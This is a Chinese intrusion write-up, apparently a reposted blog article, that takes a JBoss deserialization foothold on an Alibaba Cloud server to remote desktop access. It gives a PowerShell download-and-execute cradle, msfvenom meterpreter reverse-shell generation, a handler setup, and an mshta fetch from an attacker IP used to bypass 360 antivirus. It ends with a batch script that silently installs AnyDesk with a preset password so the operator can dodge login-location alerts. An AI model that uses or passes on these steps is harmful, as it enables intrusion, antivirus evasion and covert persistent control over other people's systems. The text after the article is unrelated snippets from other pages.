记一次从Jboss到3389远程桌面案例

VSole2021-10-11 09:20:28

0x01 前言

国庆期间朋友@Sin给我发了个存在Jboss反序列化漏洞的入口点,想打内网,但在进程列表中看到有360主动防御和阿里云盾等进程,没能绕过360上线CS/MSF......。

0x02 漏洞验证

这里我们直接利用@STG-6哥的“Java反序列化终极测试工具”来验证这个漏洞,可以看到直接就是Administrator权限了,Tomcat/Weblogic/Jboss/WebSphere默认大多数都为高权限。

0x03 单机信息搜集

tasklist /svc命令将获取到的进程列表与本地杀软进程进行对比后发现存在:ZhuDongFangYu.exe、aliyundun.exe、aliyun_assist_service.exe等进程。

还看到有gpstool.exe某GPS定位工具、GServer.exe位置服务平台(GSevrer)两个进程,以及可用于提权的Ssms.exe进程,已经是高权限了,所以暂时用不上。

net localgroup administrators命令下还发现了一个前辈留下的隐藏后门账户erdj$,$demo不是哦!

netstat -ano命令下发现1433、3389是开着的,但由于这台主机为内网,而且存在360主动防御,所以暂时无法实现文件落地、执行添加/修改用户密码、端口转发等操作。

注:即使可以执行以上这些操作,在进行3389远程桌面连接时很有可能会触发阿里云主机的异地登录提醒,所以这里还得特别注意一下,不到万不得已不建议远程连接。

Exlive GPS车辆定位服务平台端口

  • “GPS监控服务器”需要打开的端口:89、3873、1098、1501、6969、6767、2099;
  • “人员定位服务器”需要打开的端口:89、1504、7979、7878;
  • http://www1.exlive.cn/home/listModel/Gserver/main.jsp

翻看磁盘文件时发现“Exlive GPS车辆定位服务平台”安装目录下有一个conf.xml配置文件,存储着这个定位服务平台的相关配置信息,包括MSSQL数据库的用户和密码。

ipconfig /all命令下发现这台主机有两个网卡,公网:47.**.***.77,内网:10.28.176.131,两个内网DNS服务器:10.143.22.116、10.143.22.118,并且可以与外网进行通讯。

0x04 绕过主动防御上线

测试了以前常用的Powershell混淆法,不过已经被360主动防御拦了,微软defender也会检测ps1脚本内容。所有免杀和绕过方式都有时效性,一旦被公布被查杀和拦截也正常(早晚的事)。

powershell $a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://url:8888/360.ps1''))';IEX ($a+$b)


web_delivery、hta_server模块肯定更不行了,最终我们是利用Mshta.exe白名单方式成功绕过360主动防御得到目标主机Session会话,执行getsystem即可提升为SYSTEM,执行命令如下。 

1、生成载荷并编码msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=155.**.***.16 lport=443 -f raw > /tmp/shellcode.bincat /tmp/shellcode.bin | base64 -w 0
2、配置监听模块参数use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 155.**.***.16set lport 443exploit
3、目标主机执行载荷mshta http://155.**.***.16:8888/bypass360.hta

注:mshta白名单貌似只能用x86的Payload,执行成功后会自动迁移至32位的rundll32.exe进程,所以就可能会出现由werfaylt.exe弹出的下图报错,所以个人建议在得到Session后迁移至x64进程,并执行taskkill /f /im werfaylt.exe命令将该进程结束掉。

0x05 绕过异地登录提醒

虽然已经是最高权限了,但由于这台主机为阿里云,且存在360主动防御,就不添加用户进行远程桌面连接了,因为360会拦截添加用户,而且远程桌面连接时会触发异地登录提醒。

为避免触发异地登录提醒,我们可以利用AnyDesk来进行绕过,将AnyDesk.exe和静默安装批处理文件上传至可读写目录中,然后在命令行下执行该批处理文件获取连接ID。

注:如果等待时间过长,一直卡着不动获取不到连接ID时可结束当前命令行,重新进入命令行执行anydesk --get-id命令来获取连接ID。

@echo offAnyDesk.exe --install "C:\ProgramData\AnyDesk" --silentecho licence_keyABC | "C:\ProgramData\AnyDesk\AnyDesk.exe" --register-licenceecho anydesk!@# | "C:\ProgramData\AnyDesk\AnyDesk.exe" --set-passwordchoice /t 10 /d y /n >nulfor /f "delims=" %%i in ('anydesk --get-id') do set CID=%%iecho Connection ID Is: %CID%

接着我们使用静默安装批处理文件中设置的固定连接密码和获取到的连接ID即可连接到目标主机的远程桌面,成功的绕过了阿里云主机的异地登录提醒。

至此,全文结束,内网就不搞了!!!

注意事项:

在运行AnyDesk时得先使用rev2self命令恢复原始令牌,而且得在管理员在线且为激活状态下执行才能正常使用,如果管理员不在线或者为锁屏状态下执行时可能还需要验证系统密码。更多绕过方式可参考:3.3.8 腾讯云主机异地登录提醒绕过3.3.9 利用第三方绕过远程桌面连接

远程桌面连接主动防御
本作品采用《CC 协议》,转载必须注明作者和本文链接
0x03 单机信息搜集tasklist /svc命令将获取到的进程列表与本地杀软进程进行对比后发现存在:ZhuDongFangYu.exe、aliyundun.exe、aliyun_assist_service.exe等进程。netstat -ano命令下发现1433、3389是开着的,但由于这台主机为内网,而且存在360主动防御,所以暂时无法实现文件落地、执行添加/修改用户密码、端口转发等操作。
用户名:加密密码:密码最后一次修改日期:两次密码的修改时间间隔:密码有效期:密码修改到期到的警告天数:密码过期之后的宽限天数:账号失效时间:保留。查看下pid所对应的进程文件路径,
为适应新型工业化发展形势,提高我国工业控制系统网络安全保障水平,指导工业企业开展工控安全防护工作,以高水平安全护航新型工业化高质量发展,工业和信息化部日前正式印发《工业控制系统网络安全防护指南》。《防护指南》定位于面向工业企业做好网络安全防护的指导性文件,坚持统筹发展和安全,围绕安全管理、技术防护、安全运营、责任落实四方面,提出33项指导性安全防护基线要求,推动解决走好新型工业化道路过程中工业控制
当前,大国博弈、国际局势变化莫测。网络时局瞬息万变,攻防两端的转换、明暗交织的对抗,世界各国置身其中,任谁都无法置身事外。时局紧迫下,任何一个国家唯有紧随安全时代的步伐,方能在高阶对抗中立于不败之地。2020年,网络空间安全领域在由“传统”向“数字孪生”时代持续过渡下,持续进阶的网络战,也从“暗自渗透打击”走向“公开叫嚣博弈”。这无疑预示着一个新的网络空间安全时代的开始。
此次事件导致515000多名因地缘冲突、移民和其他灾难而与家人分离的弱势人群隐私数据泄露。然而,后续调查表明,此次攻击的目标正是红十字委员会的服务器。此外,详细的用户活动记录和审计可以简化事故调查过程,并防止肇事者误导调查人员。Shopify的两名员工被攻击者收买,窃取了近200名在线商家的交易记录。这起事件发生在2020年1月。辉瑞公司起诉了该员工将包含商业机密的文件上传到私人谷歌硬盘账户和个人设备。
勒索病毒已影响系统底层命令执行,无法进行正常操作。其次,同步威努特在财务系统部署主机防勒索系统加强防护,防止财务系统也受到勒索病毒攻击。3事件分析与复盘 本次安全事件因考虑到尽快恢复业务,减少经济损失而未完成对病毒样本提取分析,整个处理过程耗费3个小时的时间。4主流防勒索解决方案分析 从入侵技术方式来看,与传统网络攻击相比,勒索病毒并无特别之处甚至都不能被称之为病毒。
我已经安装了,如果没有安装,使用下面的命令进行安装yum?会出现一些提示,不需要管是什么,全部输入 y 就行了。安装成功的结果如下:4、配置或关闭 SELinux执行下面的命令查看 SELinux 状态/usr/sbin/sestatus?7 使用 windows10 连接左下角搜索远程连接打开 Windows 远程连接,输入虚拟机的 ip在弹出的 xrdp 用户验证界面,输入连接的用户名和密码就可以了~
前言Windows 远程桌面是用于管理 Windows 服务器的最广泛使用的工具之一。
VSole
网络安全专家